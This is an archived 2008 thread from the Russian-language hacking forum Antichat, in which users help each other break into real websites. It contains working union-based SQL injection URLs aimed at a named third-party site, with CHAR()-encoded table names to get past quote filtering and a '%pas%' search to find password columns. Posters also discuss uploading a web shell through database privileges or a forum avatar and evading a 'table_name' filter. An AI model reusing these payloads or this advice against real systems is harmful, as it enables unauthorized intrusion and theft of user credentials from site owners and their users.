ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

31.05.2008, 21:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
Сообщение от Xszz
Т.е. имея возможность залить обратно Дамп БД , я не могу залить шел ?
мое мнение - только если есть file_priv, у пользователя mysql.
ну или в самой базе содержится Php код, и потом выполняется в eval ... (очень редко такое бывает)
|
|
|

31.05.2008, 23:07
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,table_nam e,3,4,5,6,7,8,9+from+information_schema.tables+lim it+23,2/*
Колонка форума с юзерами. но что дальше делать это я забыл ;( подскажите
|
|
|

31.05.2008, 23:21
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме: 4608122
Репутация:
874
|
|
Вообще то тебе дальше нужно узнать как называются столбики в найденой таблице, для этого нужно вывести поле column_name из таблицы information_schema.columns при этом указать where table_name='phpbb_acl_users' но если там кавычки фильруются то нужно закодировать допустим чаром вот так table_name=CHAR(112,104,112,98,98,95,97,99,108,95, 117,115,101,114,115)
Отсюда запрос будет таким
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_na me,3,4,5,6,7,8,9+from+information_schema.columns+w here+table_name=CHAR(112,104,112,98,98,95,97,99,10 8,95,117,115,101,114,115)/*
Потом лимитом перебираеш все столбики... НО... я глянул в это таблице вроде нету поле пароля...
Я обычно для ускорения делаю так
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_na me,3,4,5,6,7,8,table_name+from+information_schema. columns+where+column_name+LIKE+CHAR(37,112,97,115, 37)+limit+0,1/*
под чаром скрыто %pas% Это значит что я хочу вывести все столбики в которых есть сочетание 'pas'  Можно конечно нарватся и на pwd тогда этот запрос не пройдет, но обычно значительно ускоряет процес.
Удачи!
|
|
|

31.05.2008, 23:45
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
А разве скл инж тул не работает в данном случае ?Особенно в пятой версии)
|
|
|

31.05.2008, 23:55
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
Велемир
о да.. еще как работает sql tool 3
пс: у кого есть норм енкодер text в char()?
Последний раз редактировалось sabe; 01.06.2008 в 00:14..
|
|
|

31.05.2008, 23:56
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме: 13395217
Репутация:
2097
|
|
http://www.webfuture.ru/igo/convert.php
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|

01.06.2008, 00:03
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
спс)
|
|
|

01.06.2008, 15:04
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
ситуация такая:
Есть форум - вобла.
там можно юзать авики. Но там как и на ачате, не видно где лежит авик. а такой адрес, типа _http://forum.antichat.ru/image.php?u=34303&dateline=1206845324
мне нужно в авик вписать шелл.
вопрос:
как мне анйти путь к моему авику? Или в этом случае аваторы в БД?
|
|
|

01.06.2008, 15:18
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
В булке аватары в бд если не ошибаюсь)
__________________
|
|
|

01.06.2008, 15:54
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Есть скуля. Версия 5. База данных и юзера выдернул.
Когда начинают вытаскивать наименования колонки, меня выкидывает на белую страницу ни без чего.
Есть предположение, что фильтрует "table_name" - как этот фильтр обойти?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|